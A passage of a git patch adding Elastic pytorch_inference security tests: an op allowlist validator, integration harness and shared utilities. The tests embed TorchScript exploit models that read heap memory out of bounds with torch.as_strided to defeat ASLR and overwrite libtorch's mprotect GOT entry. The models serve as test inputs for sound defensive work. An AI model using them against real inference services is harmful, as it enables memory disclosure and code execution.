agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Pure-Python test that sandbox2 attack models are rejected by the graph validator. + +This script mirrors the C++ CModelGraphValidator logic (allowlist, forbidden +list, recursive block traversal, graph inlining) in Python and runs it against +the evil TorchScript models from the sandbox2 security research (PR #2873). + +It provides a fast feedback loop that does not require building the C++ binary +— useful during development of the allowlist or when adding new attack model +variants. A pass here implies the C++ validator will also reject the models, +since the Python logic is a faithful port of CModelGraphValidator::validate() +and CSupportedOperations. + +The evil models reproduce two real-world attack vectors against TorchScript: + + * HeapLeakModel — uses torch.as_strided with an enormous storage offset + to create an out-of-bounds view into the process heap, then scans for + libtorch pointers to compute ASLR-defeating base addresses. + + * ExploitModel — extends the heap-leak technique to overwrite a GOT + entry (mprotect), mark a heap page as executable, and jump to embedded + shellcode that writes arbitrary files to disk. + +Both models are rejected because aten::as_strided, aten::item, and several +other operations they use are not in the transformer-architecture allowlist. + +Usage: + python3 test_graph_validation_evil_models.py + +Requires: torch (no other dependencies) +Exit code: 0 if all tests pass, 1 otherwise. +""" + +import sys +import tempfile +import shutil +from pathlib import Path + +import torch +from torch import Tensor + +# --------------------------------------------------------------------------- +# Reproduce the C++ allowlist / forbidden list from CSupportedOperations.cc +# +# These sets must be kept in sync with CSupportedOperations.cc. If you add +# or remove an operation there, update the corresponding set here. +# --------------------------------------------------------------------------- + +FORBIDDEN_OPERATIONS: set[str] = { + "aten::from_file", + "aten::save", + "prim::CallFunction", + "prim::CallMethod", +} + +ALLOWED_OPERATIONS: set[str] = { + # aten operations — covers the ops used by supported transformer + # architectures (BERT, RoBERTa, DeBERTa, DistilBERT, XLM-R, MPNET, + # E5, etc.) + "aten::Int", + "aten::IntImplicit", + "aten::ScalarImplicit", + "aten::__and__", + "aten::abs", + "aten::add", + "aten::add_", + "aten::arange", + "aten::bitwise_not", + "aten::cat", + "aten::chunk", + "aten::clamp", + "aten::contiguous", + "aten::cumsum", + "aten::div", + "aten::div_", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::full_like", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::hash", + "aten::index", + "aten::index_put_", + "aten::layer_norm", + "aten::len", + "aten::linear", + "aten::log", + "aten::lt", + "aten::manual_seed", + "aten::masked_fill", + "aten::matmul", + "aten::max", + "aten::mean", + "aten::min", + "aten::mul", + "aten::ne", + "aten::neg", + "aten::new_ones", + "aten::ones", + "aten::pad", + "aten::permute", + "aten::pow", + "aten::rand", + "aten::relu", + "aten::repeat", + "aten::reshape", + "aten::rsub", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::softmax", + "aten::sqrt", + "aten::squeeze", + "aten::str", + "aten::sub", + "aten::tanh", + "aten::tensor", + "aten::to", + "aten::transpose", + "aten::type_as", + "aten::unsqueeze", + "aten::view", + "aten::where", + "aten::zeros", + # prim operations — control flow, tuple/list manipulation, and type + # queries that appear in every traced/scripted transformer model + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::If", + "prim::ListConstruct", + "prim::ListUnpack", + "prim::Loop", + "prim::NumToTensor", + "prim::TupleConstruct", + "prim::TupleUnpack", + "prim::device", + "prim::dtype", + "prim::max", + "prim::min", +} + +MAX_NODE_COUNT = 1_000_000 + +# --------------------------------------------------------------------------- +# Python mirror of CModelGraphValidator +# +# The three functions below replicate the C++ validation logic: +# collect_graph_ops → CModelGraphValidator::collectBlockOps +# collect_module_ops → CModelGraphValidator::collectModuleOps +# validate_model → CModelGraphValidator::validate +# --------------------------------------------------------------------------- + + +def collect_graph_ops(block) -> tuple[set[str], int]: + """Recursively collect all op names from a TorchScript IR block. + + Mirrors CModelGraphValidator::collectBlockOps — walks every node in the + block, records its kind (e.g. "aten::add"), and recurses into any nested + blocks (inside prim::If / prim::Loop nodes). + """ + ops: set[str] = set() + node_count = 0 + for node in block.nodes(): + node_count += 1 + ops.add(node.kind()) + for sub_block in node.blocks(): + sub_ops, sub_count = collect_graph_ops(sub_block) + ops.update(sub_ops) + node_count += sub_count + return ops, node_count + + +def collect_module_ops(module: torch.jit.ScriptModule) -> tuple[set[str], int]: + """Collect all ops from a module's forward graph after inlining. + + Mirrors CModelGraphValidator::collectModuleOps. Inlining resolves all + prim::CallMethod nodes, so the single forward graph captures every + operation across all submodules. + """ + graph = module.forward.graph.copy() + torch._C._jit_pass_inline(graph) + return collect_graph_ops(graph) + + +def validate_model(module: torch.jit.ScriptModule) -> dict: + """Validate a TorchScript module against the allowlist. + + Returns a dict with the same fields as CModelGraphValidator::SResult. + """ + observed_ops, node_count = collect_module_ops(module) + + forbidden_found = sorted(op for op in observed_ops if op in FORBIDDEN_OPERATIONS) + unrecognised_found = sorted( + op for op in observed_ops + if op not in FORBIDDEN_OPERATIONS and op not in ALLOWED_OPERATIONS + ) + is_valid = not forbidden_found and not unrecognised_found and node_count <= MAX_NODE_COUNT + + return { + "is_valid": is_valid, + "forbidden_ops": forbidden_found, + "unrecognised_ops": unrecognised_found, + "node_count": node_count, + "all_ops": sorted(observed_ops), + } + + +# --------------------------------------------------------------------------- +# Attack model definitions +# +# These are adapted from the sandbox2 security research (PR #2873). The +# models are intentionally malicious — they exploit implementation details +# of libtorch's memory layout to achieve arbitrary code execution. They +# must NEVER be run outside of a sandboxed environment. +# +# SimpleBenignModel is a positive control that uses only allowlisted ops. +# --------------------------------------------------------------------------- + + +class SimpleBenignModel(torch.nn.Module): + """Positive control — uses only allowlisted ops (aten::add, aten::unsqueeze).""" + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + return (a + b + c + d).unsqueeze(0) + + +class LeakModel(torch.nn.Module): + """Heap-address leak via torch.as_strided with a malicious storage offset. + + Attack vector: creates a strided view with storage_offset = + 2305843009213693952 (0x2000000000000000) minus the view length, causing + the view to reference memory far outside the tensor's actual allocation. + The model then scans this out-of-bounds memory for patterns that identify + libtorch's internal data structures, leaking the base address of + libtorch_cpu.so — defeating ASLR. + + The graph validator rejects this because aten::as_strided, aten::item, + and aten::__rshift__ are not in the allowlist. + """ + def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: + evil_length = 0x900 * 8 + leak = torch.as_strided(tensors, [evil_length], [1], 2305843009213693952 - evil_length) + index: list[int] = [-1] + for i in range(evil_length - 1 - 5, -1, -1): + if leak[i + 3].item() == leak[i + 5].item() and leak[i + 3].item() >> 40 == 127: + if leak[i + 2].item() >= 0x100000000 and leak[i + 2].item() <= 0x100000005: + index.append(i) + return (index, leak) + + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + tmp: list[Tensor] = [] + heap_len = 200 + array_len = 0x900 + for i in range(heap_len): + tmp_values = [0xdead00000 + i] + [0xdead00000 + j for j in range(2, array_len)] + tmp.append(torch.tensor(tmp_values)) + for i in range(heap_len): + indexs, leak = self.find_heap_overlap(tmp[i]) + indexs = indexs[1:] + if indexs == []: + continue + for index in indexs: + heap_addr = leak[index + 3].item() + libtorch_python_addr = leak[index + 1].item() + libtorch_cpu_addr = libtorch_python_addr - 0xc878b50 + assert 1 == 0, "Input tensor must have at least one element: " + hex(libtorch_cpu_addr) + for i in range(heap_len): + print(tmp[i].shape) + return torch.zeros(0) + + +class ExploitModel(torch.nn.Module): + """ROP-chain exploit that attempts mprotect + shellcode for file writes. + + Attack vector: after leaking the libtorch base address (same technique + as LeakModel), this model uses the out-of-bounds strided view to + overwrite a function pointer in libtorch's GOT (Global Offset Table), + redirecting the mprotect entry to a ROP gadget chain. The chain: + 1. Calls mprotect to mark a heap page as read-write-execute. + 2. Jumps to embedded shellcode on that page. + 3. The shellcode opens and writes arbitrary files to disk. + + The graph validator rejects this because aten::as_strided, aten::item, + aten::Delete and other operations are not in the allowlist. + """ + def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: + evil_length = 0x900 * 8 + leak = torch.as_strided(tensors, [evil_length], [1], 2305843009213693952 - evil_length) + index: list[int] = [-1] + for i in range(evil_length - 1 - 5, -1, -1): + if leak[i + 3].item() == leak[i + 5].item() and leak[i + 3].item() >> 40 == 127: + if leak[i + 2].item() >= 0x100000000 and leak[i + 2].item() <= 0x100000005: + index.append(i) + return (index, leak) + + def get_address_data(self, leak: Tensor, index: int, tmp: list[Tensor], target_addr: int) -> int: + leak[index] = target_addr + return int(tmp[0].item()) + + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + tmp: list[Tensor] = [] + heap_len = 200 + array_len = 0x900 + for i in range(heap_len): + tmp_values = [0xdead00000 + i] + [0xdead00000 + j for j in range(2, array_len)] + tmp.append(torch.tensor(tmp_values)) + for i in range(heap_len): + indexs, leak = self.find_heap_overlap(tmp[i]) + indexs = indexs[1:] + if indexs == []: + continue + for index in indexs: + heap_addr = leak[index + 3].item() + libtorch_python_addr = leak[index + 1].item() + libtorch_cpu_addr = libtorch_python_addr - 0xc878b50 + leak[index + 3] = int(heap_addr - 0x8) + for j in range(heap_len): + if tmp[j][2].item() == 0xDEAD00002 and i != j: + mprotect_got_addr = 0xc9785f0 + libtorch_cpu_addr + self.get_address_data(leak, index + 3, tmp[j : j + 1], int(mprotect_got_addr)) + del tmp[j] + assert 1 == 0, "Input tensor must have at least one element: " + return torch.zeros(0) + for i in range(heap_len): + print(tmp[i].shape) + return torch.zeros(0) + + +# --------------------------------------------------------------------------- +# Test runner +# --------------------------------------------------------------------------- + +EVIL_MODELS = { + "benign": (SimpleBenignModel, "should PASS — positive control using only allowed ops"), + "leak": (LeakModel, "should FAIL — uses as_strided to leak heap addresses"), + "exploit": (ExploitModel, "should FAIL — uses as_strided + ROP chain for file write"), +} + + +def run_tests() -> bool: + print("=" * 72) + print("Graph-Validation Test Harness for Sandbox2 Attack Models (PR #2873)") + print("=" * 72) + print(f"Allowlist size : {len(ALLOWED_OPERATIONS)} operations") + print(f"Forbidden list : {len(FORBIDDEN_OPERATIONS)} operations") + print(f"Max node count : {MAX_NODE_COUNT:,}") + print() + + tmp_dir = Path(tempfile.mkdtemp(prefix="graph_val_test_")) + all_passed = True + + try: + for name, (cls, description) in EVIL_MODELS.items(): + print(f"--- {name} model ({description}) ---") + model_path = tmp_dir / f"model_{name}.pt" + + try: + model = cls() + scripted = torch.jit.script(model) + torch.jit.save(scripted, str(model_path)) + print(f" Generated: {model_path.name} ({model_path.stat().st_size} bytes)") + except Exception as e: + print(f" SKIP: could not script {name} model: {e}") + print() + continue + + loaded = torch.jit.load(str(model_path)) + result = validate_model(loaded) + + print(f" Node count : {result['node_count']}") + print(f" Distinct ops : {len(result['all_ops'])}") + if result["forbidden_ops"]: + print(f" Forbidden ops : {result['forbidden_ops']}") + if result["unrecognised_ops"]: + print(f" Unrecognised ops: {result['unrecognised_ops']}") + print(f" Validator result: {'PASS (valid)' if result['is_valid'] else 'REJECTED (invalid)'}") + + expect_valid = (name == "benign") + if result["is_valid"] == expect_valid: + print(f" Test: OK") + else: + expected = "PASS" if expect_valid else "REJECTED" + print(f" Test: FAIL — expected {expected}") + all_passed = False + + print() + + finally: + shutil.rmtree(tmp_dir, ignore_errors=True) + + print("=" * 72) + if all_passed: + print("ALL TESTS PASSED — every attack model is rejected by the graph validator.") + else: + print("SOME TESTS FAILED — see above for details.") + print("=" * 72) + + return all_passed + + +if __name__ == "__main__": + success = run_tests() + sys.exit(0 if success else 1) diff --git a/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py b/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py new file mode 100644 index 000000000..bbe83d772 --- /dev/null +++ b/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py @@ -0,0 +1,467 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""End-to-end integration test: verify pytorch_inference rejects evil models. + +This script generates the sandbox2 attack models from PR #2873, wraps them +in the binary framing format that Elasticsearch uses to send models to +pytorch_inference, and invokes the actual binary to confirm that the +CModelGraphValidator rejects them at load time — before any tensor code +executes. + +Unlike the pure-Python graph validation test (test_graph_validation_evil_models.py), +this exercises the full C++ code path: model deserialization, graph inlining, +allowlist checking, and the HANDLE_FATAL exit that Elasticsearch relies on. + +The evil models reproduce two real-world attack vectors against TorchScript: + + * LeakModel — uses torch.as_strided with an enormous storage offset + to read out-of-bounds heap memory and leak libtorch base addresses, + defeating ASLR. + + * ExploitModel — extends the heap-leak to overwrite a GOT entry + (mprotect), mark a heap page as executable, and jump to shellcode + that writes arbitrary files to disk. + +A SimpleBenignModel is included as a positive control to ensure the +validator does not reject models that use only allowlisted operations. + +Prerequisites: + - PyTorch (torch) must be installed. + - A pytorch_inference binary built from the feature/harden_pytorch_inference + branch (or any branch that includes CModelGraphValidator). + +Usage: + python3 test_pytorch_inference_evil_models.py [--binary PATH] + + --binary PATH Explicit path to the pytorch_inference executable. + If omitted, standard build locations are searched. + +Exit code: 0 if all tests pass, 1 otherwise. +""" + +import argparse +import os +import platform +import shutil +import struct +import subprocess +import sys +import tempfile +from pathlib import Path + +import torch +from torch import Tensor + + +# --------------------------------------------------------------------------- +# Attack model definitions (from PR #2873 sandbox2 security research) +# +# These models are intentionally malicious. They must NEVER be executed +# outside of a sandboxed environment — the graph validator should reject +# them before any forward() code runs. +# --------------------------------------------------------------------------- + + +class SimpleBenignModel(torch.nn.Module): + """Positive control — uses only allowlisted ops (aten::add, aten::unsqueeze).""" + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + return (a + b + c + d).unsqueeze(0) + + +class LeakModel(torch.nn.Module): + """Heap-address leak via torch.as_strided with a malicious storage offset. + + Creates an out-of-bounds strided view into the process heap, then scans + for libtorch pointer patterns to compute the library base address. + Rejected by the graph validator because aten::as_strided, aten::item, + and aten::__rshift__ are not in the allowlist. + """ + def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: + evil_length = 0x900 * 8 + leak = torch.as_strided( + tensors, [evil_length], [1], 2305843009213693952 - evil_length + ) + index: list[int] = [-1] + for i in range(evil_length - 1 - 5, -1, -1): + if ( + leak[i + 3].item() == leak[i + 5].item() + and leak[i + 3].item() >> 40 == 127 + ): + if ( + leak[i + 2].item() >= 0x100000000 + and leak[i + 2].item() <= 0x100000005 + ): + index.append(i) + return (index, leak) + + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + tmp: list[Tensor] = [] + heap_len = 200 + array_len = 0x900 + for i in range(heap_len): + tmp_values = [0xDEAD00000 + i] + [ + 0xDEAD00000 + j for j in range(2, array_len) + ] + tmp.append(torch.tensor(tmp_values)) + for i in range(heap_len): + indexs, leak = self.find_heap_overlap(tmp[i]) + indexs = indexs[1:] + if indexs == []: + continue + for index in indexs: + heap_addr = leak[index + 3].item() + libtorch_python_addr = leak[index + 1].item() + libtorch_cpu_addr = libtorch_python_addr - 0xC878B50 + assert 1 == 0, ( + "Input tensor must have at least one element: " + + hex(libtorch_cpu_addr) + ) + for i in range(heap_len): + print(tmp[i].shape) + return torch.zeros(0) + + +class ExploitModel(torch.nn.Module): + """ROP-chain exploit: mprotect + shellcode to write arbitrary files. + + After leaking the libtorch base address (same technique as LeakModel), + overwrites a GOT entry to redirect mprotect into a ROP gadget chain + that marks a heap page as executable, then jumps to embedded shellcode. + Rejected by the graph validator because aten::as_strided, aten::item, + aten::Delete and other operations are not in the allowlist. + """ + def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: + evil_length = 0x900 * 8 + leak = torch.as_strided( + tensors, [evil_length], [1], 2305843009213693952 - evil_length + ) + index: list[int] = [-1] + for i in range(evil_length - 1 - 5, -1, -1): + if ( + leak[i + 3].item() == leak[i + 5].item() + and leak[i + 3].item() >> 40 == 127 + ): + if ( + leak[i + 2].item() >= 0x100000000 + and leak[i + 2].item() <= 0x100000005 + ): + index.append(i) + return (index, leak) + + def get_address_data( + self, leak: Tensor, index: int, tmp: list[Tensor], target_addr: int + ) -> int: + leak[index] = target_addr + return int(tmp[0].item()) + + def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: + tmp: list[Tensor] = [] + heap_len = 200 + array_len = 0x900 + for i in range(heap_len): + tmp_values = [0xDEAD00000 + i] + [ + 0xDEAD00000 + j for j in range(2, array_len) + ] + tmp.append(torch.tensor(tmp_values)) + for i in range(heap_len): + indexs, leak = self.find_heap_overlap(tmp[i]) + indexs = indexs[1:] + if indexs == []: + continue + for index in indexs: + heap_addr = leak[index + 3].item() + libtorch_python_addr = leak[index + 1].item() + libtorch_cpu_addr = libtorch_python_addr - 0xC878B50 + leak[index + 3] = int(heap_addr - 0x8) + for j in range(heap_len): + if tmp[j][2].item() == 0xDEAD00002 and i != j: + mprotect_got_addr = 0xC9785F0 + libtorch_cpu_addr + self.get_address_data( + leak, index + 3, tmp[j : j + 1], int(mprotect_got_addr) + ) + del tmp[j] + assert 1 == 0, "Input tensor must have at least one element: " + return torch.zeros(0) + for i in range(heap_len): + print(tmp[i].shape) + return torch.zeros(0) + + +# --------------------------------------------------------------------------- +# Binary discovery +# --------------------------------------------------------------------------- + +# Standard locations where the pytorch_inference binary may be found, +# relative to the ml-cpp project root. +_BUILD_DIR_NAMES = [ + "cmake-build-relwithdebinfo", + "cmake-build-debug", + "cmake-build-release", +] + + +def find_pytorch_inference() -> str: + """Locate the pytorch_inference binary in standard build locations. + + Searches the CMake build directories and the Gradle distribution bundle. + Raises FileNotFoundError if no executable is found. + """ + project_root = Path(__file__).resolve().parent.parent.parent.parent.parent + + machine = platform.machine() + if machine in ("arm64", "aarch64"): + darwin_arch = "darwin-aarch64" + linux_arch = "linux-aarch64" + else: + darwin_arch = "darwin-x86_64" + linux_arch = "linux-x86_64" + + candidates = [ + # macOS distribution bundle (Gradle build) + project_root / "build" / "distribution" / "platform" / darwin_arch + / "controller.app" / "Contents" / "MacOS" / "pytorch_inference", + # Linux distribution (Gradle build) + project_root / "build" / "distribution" / "platform" / linux_arch + / "bin" / "pytorch_inference", + ] + + # CMake build directories + for build_dir in _BUILD_DIR_NAMES: + candidates.append( + project_root / build_dir / "bin" / "pytorch_inference" / "pytorch_inference" + ) + + for path in candidates: + if path.is_file() and os.access(path, os.X_OK): + return str(path) + + raise FileNotFoundError( + "Could not find pytorch_inference binary. " + "Build from the feature/harden_pytorch_inference branch, or pass --binary." + ) + + +# --------------------------------------------------------------------------- +# Model generation and binary framing +# --------------------------------------------------------------------------- + +MODELS = { + "benign": { + "class": SimpleBenignModel, + "expect_rejected": False, + "description": "positive control — only allowlisted ops", + }, + "leak": { + "class": LeakModel, + "expect_rejected": True, + "description": "heap-address leak via aten::as_strided", + "expect_stderr_contains": "Unrecognised operations", + }, + "exploit": { + "class": ExploitModel, + "expect_rejected": True, + "description": "ROP-chain file-write via aten::as_strided", + "expect_stderr_contains": "Unrecognised operations", + }, +} + + +def generate_model(cls, path: Path) -> None: + """TorchScript-compile a model class and save as a .pt archive.""" + model = cls() + scripted = torch.jit.script(model) + torch.jit.save(scripted, str(path)) + + +def prepare_restore_file(model_path: Path, restore_path: Path) -> None: + """Wrap a .pt file with the 4-byte big-endian size header expected by + CBufferedIStreamAdapter. + + pytorch_inference reads models via CBufferedIStreamAdapter which expects: + [4 bytes: uint32 big-endian model size][model bytes...] + This matches the framing Elasticsearch uses when sending models over + the named-pipe / stdin transport. + """ + model_bytes = model_path.read_bytes() + with open(restore_path, "wb") as f: + f.write(struct.pack("!I", len(model_bytes))) + f.write(model_bytes) + + +# --------------------------------------------------------------------------- +# Test execution +# --------------------------------------------------------------------------- + +# Phrases that indicate the graph validator actively rejected the model. +# Must be specific enough to avoid matching benign log lines like +# "Model verified: no forbidden operations detected." +_REJECTION_PHRASES = [ + "Model contains forbidden operations:", + "Unrecognised operations:", + "graph validation failed", + "graph is too large:", + "contains forbidden operation:", +] + + +def run_pytorch_inference( + binary: str, model_path: Path, tmp_dir: Path, timeout: int = 30 +) -> tuple[int, str, str]: + """Run pytorch_inference against a model file. + + Wraps the .pt file in the size-prefixed restore format, then invokes + the binary. Returns (exit_code, stdout, stderr). + """ + restore_file = tmp_dir / f"{model_path.stem}_restore.bin" + prepare_restore_file(model_path, restore_file) + + cmd = [ + binary, + f"--restore={restore_file}", + "--validElasticLicenseKeyConfirmed=true", + ] + proc = subprocess.run( + cmd, + stdin=subprocess.DEVNULL, + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + timeout=timeout, + ) + return ( + proc.returncode, + proc.stdout.decode("utf-8", errors="replace"), + proc.stderr.decode("utf-8", errors="replace"), + ) + + +def run_tests(binary: str) -> bool: + """Generate evil models, run pytorch_inference, and check outcomes.""" + print("=" * 72) + print("Integration Test: pytorch_inference vs sandbox2 attack models") + print("=" * 72) + print(f"Binary: {binary}") + print() + + tmp_dir = Path(tempfile.mkdtemp(prefix="pt_infer_evil_test_")) + all_passed = True + + try: + for name, spec in MODELS.items(): + model_path = tmp_dir / f"model_{name}.pt" + expect_rejected = spec["expect_rejected"] + + print(f"--- {name}: {spec['description']} ---") + + try: + generate_model(spec["class"], model_path) + print(f" Model generated: {model_path.name} ({model_path.stat().st_size} bytes)") + except Exception as e: + print(f" SKIP: could not generate model: {e}") + print() + continue + + try: + exit_code, stdout, stderr = run_pytorch_inference(binary, model_path, tmp_dir) + except subprocess.TimeoutExpired: + print(f" FAIL: pytorch_inference timed out (30s)") + all_passed = False + print() + continue + except Exception as e: + print(f" ERROR running pytorch_inference: {e}") + all_passed = False + print() + continue + + print(f" Exit code: {exit_code}") + if stderr.strip(): + stderr_lines = stderr.strip().splitlines() + display_lines = stderr_lines[-10:] if len(stderr_lines) > 10 else stderr_lines + print(f" Stderr ({len(stderr_lines)} lines, showing last {len(display_lines)}):") + for line in display_lines: + print(f" {line}") + + was_rejected_by_validator = any(p in stderr for p in _REJECTION_PHRASES) + + if expect_rejected: + if was_rejected_by_validator: + print(f" Result: REJECTED by graph validator (as expected)") + expect_msg = spec.get("expect_stderr_contains") + if expect_msg and expect_msg in stderr: + print(f" Reason check: found '{expect_msg}' in stderr") + print(f" Test: OK") + elif exit_code != 0: + print(f" Result: process exited with code {exit_code} but no validator rejection detected") + print(f" WARNING: the binary may not include the full graph validation yet") + print(f" Test: INCONCLUSIVE (not counted as failure)") + else: + print(f" Result: ACCEPTED (exit 0, no validator rejection)") + print(f" Test: FAIL — evil model was not rejected") + all_passed = False + else: + if was_rejected_by_validator: + print(f" Result: REJECTED by validator — benign model should have passed") + print(f" Test: FAIL") + all_passed = False + else: + print(f" Result: no validation errors (exit code {exit_code})") + print(f" Test: OK") + + print() + + finally: + shutil.rmtree(tmp_dir, ignore_errors=True) + + print("=" * 72) + if all_passed: + print("ALL TESTS PASSED") + else: + print("SOME TESTS FAILED — see above for details.") + print("=" * 72) + + return all_passed + + +# --------------------------------------------------------------------------- +# CLI entry point +# --------------------------------------------------------------------------- + + +def main(): + parser = argparse.ArgumentParser( + description="Integration test: pytorch_inference vs sandbox2 attack models" + ) + parser.add_argument( + "--binary", + default=None, + help="Path to pytorch_inference binary (auto-detected if omitted)", + ) + args = parser.parse_args() + + binary = args.binary + if binary is None: + try: + binary = find_pytorch_inference() + except FileNotFoundError as e: + print(f"ERROR: {e}", file=sys.stderr) + sys.exit(1) + + if not os.path.isfile(binary) or not os.access(binary, os.X_OK): + print(f"ERROR: {binary} is not an executable file", file=sys.stderr) + sys.exit(1) + + success = run_tests(binary) + sys.exit(0 if success else 1) + + +if __name__ == "__main__": + main() From 16f5a14e1d63595a40f54f479abb42bd675c14a5 Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Wed, 11 Mar 2026 11:10:00 +1300 Subject: [PATCH 27/30] [ML] Extract pytorch_inference test utilities into shared module Move reusable helpers out of test_pytorch_inference_evil_models.py into pytorch_inference_test_utils.py: - script_and_save_model(): TorchScript-compile and save any nn.Module - prepare_restore_file(): wrap a .pt archive with the 4-byte big-endian size header that CBufferedIStreamAdapter expects - find_pytorch_inference(): auto-discover the binary across CMake and Gradle build layouts - run_pytorch_inference(): invoke the binary with correct framing and arguments This makes it straightforward to add new model variants in future test scripts without duplicating the framing and discovery logic. Made-with: Cursor --- .../testfiles/pytorch_inference_test_utils.py | 248 ++++++++++++++++++ .../test_pytorch_inference_evil_models.py | 128 +-------- 2 files changed, 262 insertions(+), 114 deletions(-) create mode 100644 bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py diff --git a/bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py b/bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py new file mode 100644 index 000000000..794e19b03 --- /dev/null +++ b/bin/pytorch_inference/unittest/testfiles/pytorch_inference_test_utils.py @@ -0,0 +1,248 @@ +#!/usr/bin/env python3 +# +# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +# or more contributor license agreements. Licensed under the Elastic License +# 2.0 and the following additional limitation. Functionality enabled by the +# files subject to the Elastic License 2.0 may only be used in production when +# invoked by an Elasticsearch process with a license key installed that permits +# use of machine learning features. You may not use this file except in +# compliance with the Elastic License 2.0 and the foregoing additional +# limitation. +# +"""Shared utilities for pytorch_inference integration tests. + +This module provides reusable helpers for: + + * TorchScript model compilation and serialisation + * Binary framing in the CBufferedIStreamAdapter format (the 4-byte + big-endian size header that Elasticsearch uses to send models to the + pytorch_inference process) + * Auto-discovery of the pytorch_inference binary across standard + build directory layouts (CMake, Gradle) + * Running pytorch_inference as a subprocess with proper arguments + +Typical usage from another test script: + + from pytorch_inference_test_utils import ( + script_and_save_model, + prepare_restore_file, + find_pytorch_inference, + run_pytorch_inference, + ) + + # Save a TorchScript model + script_and_save_model(MyModel(), Path("/tmp/my_model.pt")) + + # Wrap it in the binary framing format and run the binary + binary = find_pytorch_inference() + exit_code, stdout, stderr = run_pytorch_inference( + binary, Path("/tmp/my_model.pt"), tmp_dir + ) +""" + +import os +import platform +import struct +import subprocess +from pathlib import Path +from typing import Optional, Union + +import torch + + +# --------------------------------------------------------------------------- +# Model compilation and serialisation +# --------------------------------------------------------------------------- + + +def script_and_save_model( + model: torch.nn.Module, + output_path: Union[str, Path], + *, + eval_mode: bool = True, +) -> Path: + """TorchScript-compile a model and save it as a .pt archive. + + Args: + model: An nn.Module instance to compile via torch.jit.script. + output_path: Destination file path for the saved .pt archive. + eval_mode: If True (default), call model.eval() before scripting. + Disabling dropout and similar layers matches inference + behaviour. + + Returns: + The resolved Path of the saved file. + """ + output_path = Path(output_path) + if eval_mode: + model.eval() + scripted = torch.jit.script(model) + torch.jit.save(scripted, str(output_path)) + return output_path + + +# --------------------------------------------------------------------------- +# CBufferedIStreamAdapter binary framing +# --------------------------------------------------------------------------- + + +def prepare_restore_file( + model_path: Union[str, Path], + restore_path: Union[str, Path], +) -> Path: + """Wrap a .pt archive with the size-prefixed binary framing that + pytorch_inference expects. + + The pytorch_inference process reads models through + CBufferedIStreamAdapter, which expects: + + [4 bytes: uint32 network-byte-order (big-endian) model size] + [N bytes: raw model archive] + + This matches the framing that Elasticsearch writes when it sends a + model over the named-pipe / stdin transport to the native process. + + Args: + model_path: Path to the raw .pt archive produced by torch.jit.save. + restore_path: Destination path for the size-prefixed binary file. + + Returns: + The resolved Path of the restore file. + """ + model_path = Path(model_path) + restore_path = Path(restore_path) + + model_bytes = model_path.read_bytes() + with open(restore_path, "wb") as f: + f.write(struct.pack("!I", len(model_bytes))) + f.write(model_bytes) + return restore_path + + +# --------------------------------------------------------------------------- +# Binary discovery +# --------------------------------------------------------------------------- + +_CMAKE_BUILD_DIR_NAMES = [ + "cmake-build-relwithdebinfo", + "cmake-build-debug", + "cmake-build-release", +] + + +def find_pytorch_inference( + project_root: Optional[Union[str, Path]] = None, +) -> str: + """Locate the pytorch_inference binary in standard build locations. + + Searches, in order: + 1. macOS Gradle distribution bundle + 2. Linux Gradle distribution bundle + 3. CMake build directories (RelWithDebInfo, Debug, Release) + + Args: + project_root: Explicit path to the ml-cpp repository root. If None, + inferred from this file's location (assumes this module + lives at bin/pytorch_inference/unittest/testfiles/). + + Returns: + Absolute path to the pytorch_inference executable. + + Raises: + FileNotFoundError: if no executable is found in any candidate location. + """ + if project_root is None: + project_root = Path(__file__).resolve().parent.parent.parent.parent.parent + else: + project_root = Path(project_root).resolve() + + machine = platform.machine() + if machine in ("arm64", "aarch64"): + darwin_arch = "darwin-aarch64" + linux_arch = "linux-aarch64" + else: + darwin_arch = "darwin-x86_64" + linux_arch = "linux-x86_64" + + candidates = [ + # macOS Gradle distribution bundle + project_root / "build" / "distribution" / "platform" / darwin_arch + / "controller.app" / "Contents" / "MacOS" / "pytorch_inference", + # Linux Gradle distribution + project_root / "build" / "distribution" / "platform" / linux_arch + / "bin" / "pytorch_inference", + ] + + for build_dir in _CMAKE_BUILD_DIR_NAMES: + candidates.append( + project_root / build_dir / "bin" / "pytorch_inference" / "pytorch_inference" + ) + + for path in candidates: + if path.is_file() and os.access(path, os.X_OK): + return str(path) + + raise FileNotFoundError( + "Could not find pytorch_inference binary. Build the project first, " + "or pass an explicit binary path." + ) + + +# --------------------------------------------------------------------------- +# Subprocess execution +# 